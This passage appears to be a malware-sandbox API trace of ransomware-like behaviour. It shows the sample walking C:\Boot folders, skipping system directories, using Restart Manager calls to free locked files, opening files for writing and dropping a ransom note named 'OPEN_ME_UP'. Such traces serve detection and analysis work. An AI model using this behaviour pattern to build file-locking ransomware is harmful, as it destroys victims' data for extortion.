ftCreationTime.dwLowDateTime=0xc4bc156a, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef918492, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x2380b, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="meiryo_boot.ttf", cAlternateFileName="MEIRYO~2.TTF")) returned 1 [0077.620] lstrcmpiW (lpString1="meiryo_boot.ttf", lpString2="Windows") returned -1 [0077.620] lstrcmpiW (lpString1="meiryo_boot.ttf", lpString2="$Recycle.bin") returned 1 [0077.620] lstrcmpiW (lpString1="meiryo_boot.ttf", lpString2="System Volume Information") returned -1 [0077.620] lstrcmpiW (lpString1="meiryo_boot.ttf", lpString2="Program Files") returned -1 [0077.620] lstrcmpiW (lpString1="meiryo_boot.ttf", lpString2="Program Files (x86)") returned -1 [0077.620] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\meiryo_boot.ttf") returned 33 [0077.620] StrStrIW (lpFirst="meiryo_boot.ttf", lpSrch=".payload") returned 0x0 [0077.620] lstrcmpW (lpString1="meiryo_boot.ttf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.620] lstrcmpW (lpString1="meiryo_boot.ttf", lpString2="taridd") returned -1 [0077.620] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\Fonts\\meiryo_boot.ttf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0077.620] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\meiryo_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0077.664] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0077.664] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0077.664] RmStartSession () returned 0x0 [0077.666] RmRegisterResources () returned 0x0 [0077.671] RmGetList () returned 0x0 [0078.027] RmEndSession () returned 0x0 [0078.505] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0078.505] FindNextFileW (in: hFindFile=0x6063e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4bc156a, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef92a947, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x27a1b, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="msjhn_boot.ttf", cAlternateFileName="MSJHN_~1.TTF")) returned 1 [0078.506] lstrcmpiW (lpString1="msjhn_boot.ttf", lpString2="Windows") returned -1 [0078.506] lstrcmpiW (lpString1="msjhn_boot.ttf", lpString2="$Recycle.bin") returned 1 [0078.506] lstrcmpiW (lpString1="msjhn_boot.ttf", lpString2="System Volume Information") returned -1 [0078.506] lstrcmpiW (lpString1="msjhn_boot.ttf", lpString2="Program Files") returned -1 [0078.506] lstrcmpiW (lpString1="msjhn_boot.ttf", lpString2="Program Files (x86)") returned -1 [0078.506] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\msjhn_boot.ttf") returned 32 [0078.506] StrStrIW (lpFirst="msjhn_boot.ttf", lpSrch=".payload") returned 0x0 [0078.506] lstrcmpW (lpString1="msjhn_boot.ttf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.506] lstrcmpW (lpString1="msjhn_boot.ttf", lpString2="taridd") returned -1 [0078.506] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\Fonts\\msjhn_boot.ttf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0078.506] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msjhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0078.506] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0078.506] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0078.506] RmStartSession () returned 0x0 [0078.509] RmRegisterResources () returned 0x0 [0078.513] RmGetList () returned 0x0 [0079.317] RmEndSession () returned 0x0 [0079.567] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0079.567] FindNextFileW (in: hFindFile=0x6063e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4be7820, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef93ce3b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x281fb, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="msjh_boot.ttf", cAlternateFileName="MSJH_B~1.TTF")) returned 1 [0079.567] lstrcmpiW (lpString1="msjh_boot.ttf", lpString2="Windows") returned -1 [0079.567] lstrcmpiW (lpString1="msjh_boot.ttf", lpString2="$Recycle.bin") returned 1 [0079.567] lstrcmpiW (lpString1="msjh_boot.ttf", lpString2="System Volume Information") returned -1 [0079.567] lstrcmpiW (lpString1="msjh_boot.ttf", lpString2="Program Files") returned -1 [0079.567] lstrcmpiW (lpString1="msjh_boot.ttf", lpString2="Program Files (x86)") returned -1 [0079.567] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\msjh_boot.ttf") returned 31 [0079.567] StrStrIW (lpFirst="msjh_boot.ttf", lpSrch=".payload") returned 0x0 [0079.567] lstrcmpW (lpString1="msjh_boot.ttf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.567] lstrcmpW (lpString1="msjh_boot.ttf", lpString2="taridd") returned -1 [0079.567] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\Fonts\\msjh_boot.ttf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0079.568] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msjh_boot.ttf" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0079.686] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0079.686] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0079.686] RmStartSession () returned 0x0 [0079.688] RmRegisterResources () returned 0x0 [0079.693] RmGetList () returned 0x0 [0080.001] RmEndSession () returned 0x0 [0080.133] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0080.133] FindNextFileW (in: hFindFile=0x6063e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4be7820, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef94dfcd, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x25b3b, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="msyhn_boot.ttf", cAlternateFileName="MSYHN_~1.TTF")) returned 1 [0080.133] lstrcmpiW (lpString1="msyhn_boot.ttf", lpString2="Windows") returned -1 [0080.133] lstrcmpiW (lpString1="msyhn_boot.ttf", lpString2="$Recycle.bin") returned 1 [0080.133] lstrcmpiW (lpString1="msyhn_boot.ttf", lpString2="System Volume Information") returned -1 [0080.133] lstrcmpiW (lpString1="msyhn_boot.ttf", lpString2="Program Files") returned -1 [0080.133] lstrcmpiW (lpString1="msyhn_boot.ttf", lpString2="Program Files (x86)") returned -1 [0080.133] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\msyhn_boot.ttf") returned 32 [0080.133] StrStrIW (lpFirst="msyhn_boot.ttf", lpSrch=".payload") returned 0x0 [0080.133] lstrcmpW (lpString1="msyhn_boot.ttf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0080.133] lstrcmpW (lpString1="msyhn_boot.ttf", lpString2="taridd") returned -1 [0080.133] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\Fonts\\msyhn_boot.ttf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0080.133] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msyhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0080.133] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0080.161] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0080.161] RmStartSession () returned 0x0 [0080.163] RmRegisterResources () returned 0x0 [0080.169] RmGetList () returned 0x0 [0080.248] RmEndSession () returned 0x0 [0080.312] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0080.312] FindNextFileW (in: hFindFile=0x6063e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4be7820, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef95f141, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x26255, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="msyh_boot.ttf", cAlternateFileName="MSYH_B~1.TTF")) returned 1 [0080.312] lstrcmpiW (lpString1="msyh_boot.ttf", lpString2="Windows") returned -1 [0080.312] lstrcmpiW (lpString1="msyh_boot.ttf", lpString2="$Recycle.bin") returned 1 [0080.312] lstrcmpiW (lpString1="msyh_boot.ttf", lpString2="System Volume Information") returned -1 [0080.312] lstrcmpiW (lpString1="msyh_boot.ttf", lpString2="Program Files") returned -1 [0080.312] lstrcmpiW (lpString1="msyh_boot.ttf", lpString2="Program Files (x86)") returned -1 [0080.312] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\msyh_boot.ttf") returned 31 [0080.312] StrStrIW (lpFirst="msyh_boot.ttf", lpSrch=".payload") returned 0x0 [0080.312] lstrcmpW (lpString1="msyh_boot.ttf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0080.312] lstrcmpW (lpString1="msyh_boot.ttf", lpString2="taridd") returned -1 [0080.312] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\Fonts\\msyh_boot.ttf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0080.312] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msyh_boot.ttf" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0080.312] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0080.312] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0080.312] RmStartSession () returned 0x0 [0080.314] RmRegisterResources () returned 0x0 [0080.319] RmGetList () returned 0x0 [0080.396] RmEndSession () returned 0x0 [0080.515] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0080.515] FindNextFileW (in: hFindFile=0x6063e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4be7820, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef96ef3e, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xaf3b, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="segmono_boot.ttf", cAlternateFileName="SEGMON~1.TTF")) returned 1 [0080.515] lstrcmpiW (lpString1="segmono_boot.ttf", lpString2="Windows") returned -1 [0080.515] lstrcmpiW (lpString1="segmono_boot.ttf", lpString2="$Recycle.bin") returned 1 [0080.515] lstrcmpiW (lpString1="segmono_boot.ttf", lpString2="System Volume Information") returned -1 [0080.515] lstrcmpiW (lpString1="segmono_boot.ttf", lpString2="Program Files") returned 1 [0080.515] lstrcmpiW (lpString1="segmono_boot.ttf", lpString2="Program Files (x86)") returned 1 [0080.515] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\segmono_boot.ttf") returned 34 [0080.515] StrStrIW (lpFirst="segmono_boot.ttf", lpSrch=".payload") returned 0x0 [0080.515] lstrcmpW (lpString1="segmono_boot.ttf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0080.515] lstrcmpW (lpString1="segmono_boot.ttf", lpString2="taridd") returned -1 [0080.515] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\Fonts\\segmono_boot.ttf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0080.516] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\segmono_boot.ttf" (normalized: "c:\\boot\\fonts\\segmono_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0080.516] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0080.516] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0080.516] RmStartSession () returned 0x0 [0080.518] RmRegisterResources () returned 0x0 [0080.523] RmGetList () returned 0x0 [0080.604] RmEndSession () returned 0x0 [0080.669] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0080.669] FindNextFileW (in: hFindFile=0x6063e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c0da69, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef97d9ab, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x14f66, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="segoen_slboot.ttf", cAlternateFileName="SEGOEN~1.TTF")) returned 1 [0080.669] lstrcmpiW (lpString1="segoen_slboot.ttf", lpString2="Windows") returned -1 [0080.669] lstrcmpiW (lpString1="segoen_slboot.ttf", lpString2="$Recycle.bin") returned 1 [0080.669] lstrcmpiW (lpString1="segoen_slboot.ttf", lpString2="System Volume Information") returned -1 [0080.669] lstrcmpiW (lpString1="segoen_slboot.ttf", lpString2="Program Files") returned 1 [0080.669] lstrcmpiW (lpString1="segoen_slboot.ttf", lpString2="Program Files (x86)") returned 1 [0080.669] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\segoen_slboot.ttf") returned 35 [0080.669] StrStrIW (lpFirst="segoen_slboot.ttf", lpSrch=".payload") returned 0x0 [0080.669] lstrcmpW (lpString1="segoen_slboot.ttf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0080.669] lstrcmpW (lpString1="segoen_slboot.ttf", lpString2="taridd") returned -1 [0080.669] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\Fonts\\segoen_slboot.ttf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0080.669] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\segoen_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoen_slboot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0080.669] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0080.669] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0080.669] RmStartSession () returned 0x0 [0080.671] RmRegisterResources () returned 0x0 [0080.677] RmGetList () returned 0x0 [0080.769] RmEndSession () returned 0x0 [0081.015] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0081.015] FindNextFileW (in: hFindFile=0x6063e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef98c419, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x150a2, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="segoe_slboot.ttf", cAlternateFileName="SEGOE_~1.TTF")) returned 1 [0081.015] lstrcmpiW (lpString1="segoe_slboot.ttf", lpString2="Windows") returned -1 [0081.015] lstrcmpiW (lpString1="segoe_slboot.ttf", lpString2="$Recycle.bin") returned 1 [0081.015] lstrcmpiW (lpString1="segoe_slboot.ttf", lpString2="System Volume Information") returned -1 [0081.015] lstrcmpiW (lpString1="segoe_slboot.ttf", lpString2="Program Files") returned 1 [0081.015] lstrcmpiW (lpString1="segoe_slboot.ttf", lpString2="Program Files (x86)") returned 1 [0081.015] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\segoe_slboot.ttf") returned 34 [0081.015] StrStrIW (lpFirst="segoe_slboot.ttf", lpSrch=".payload") returned 0x0 [0081.015] lstrcmpW (lpString1="segoe_slboot.ttf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.015] lstrcmpW (lpString1="segoe_slboot.ttf", lpString2="taridd") returned -1 [0081.015] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\Fonts\\segoe_slboot.ttf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0081.015] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\segoe_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoe_slboot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0081.016] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0081.016] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0081.016] RmStartSession () returned 0x0 [0081.018] RmRegisterResources () returned 0x0 [0081.023] RmGetList () returned 0x0 [0081.155] RmEndSession () returned 0x0 [0081.222] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0081.222] FindNextFileW (in: hFindFile=0x6063e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef999ae4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xbfc3, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0081.223] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="Windows") returned -1 [0081.223] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="$Recycle.bin") returned 1 [0081.223] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="System Volume Information") returned 1 [0081.223] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="Program Files") returned 1 [0081.223] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="Program Files (x86)") returned 1 [0081.223] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 31 [0081.223] StrStrIW (lpFirst="wgl4_boot.ttf", lpSrch=".payload") returned 0x0 [0081.223] lstrcmpW (lpString1="wgl4_boot.ttf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.223] lstrcmpW (lpString1="wgl4_boot.ttf", lpString2="taridd") returned 1 [0081.223] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0081.223] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0081.223] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0081.223] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0081.223] RmStartSession () returned 0x0 [0081.225] RmRegisterResources () returned 0x0 [0081.230] RmGetList () returned 0x0 [0081.318] RmEndSession () returned 0x0 [0081.377] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0081.377] FindNextFileW (in: hFindFile=0x6063e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef999ae4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xbfc3, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0081.377] FindClose (in: hFindFile=0x6063e0 | out: hFindFile=0x6063e0) returned 1 [0081.377] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0081.377] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\fonts\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0081.377] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0081.378] CloseHandle (hObject=0x430) returned 1 [0081.379] GetProcessHeap () returned 0x5e0000 [0081.379] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60ec60 | out: hHeap=0x5e0000) returned 1 [0081.379] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="fr-CA", cAlternateFileName="")) returned 1 [0081.379] lstrcmpiW (lpString1="fr-CA", lpString2="Windows") returned -1 [0081.379] lstrcmpiW (lpString1="fr-CA", lpString2="$Recycle.bin") returned 1 [0081.379] lstrcmpiW (lpString1="fr-CA", lpString2="System Volume Information") returned -1 [0081.379] lstrcmpiW (lpString1="fr-CA", lpString2="Program Files") returned -1 [0081.379] lstrcmpiW (lpString1="fr-CA", lpString2="Program Files (x86)") returned -1 [0081.379] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-CA") returned 17 [0081.379] lstrcmpW (lpString1="fr-CA", lpString2=".") returned 1 [0081.379] lstrcmpW (lpString1="fr-CA", lpString2="..") returned 1 [0081.379] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\fr-CA", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0081.379] GetProcessHeap () returned 0x5e0000 [0081.379] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60ec60 [0081.379] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\fr-CA\\*") returned 19 [0081.379] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fr-CA\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x606620 [0081.390] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.390] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.390] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.390] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.390] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.390] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-CA\\.") returned 19 [0081.390] lstrcmpW (lpString1=".", lpString2=".") 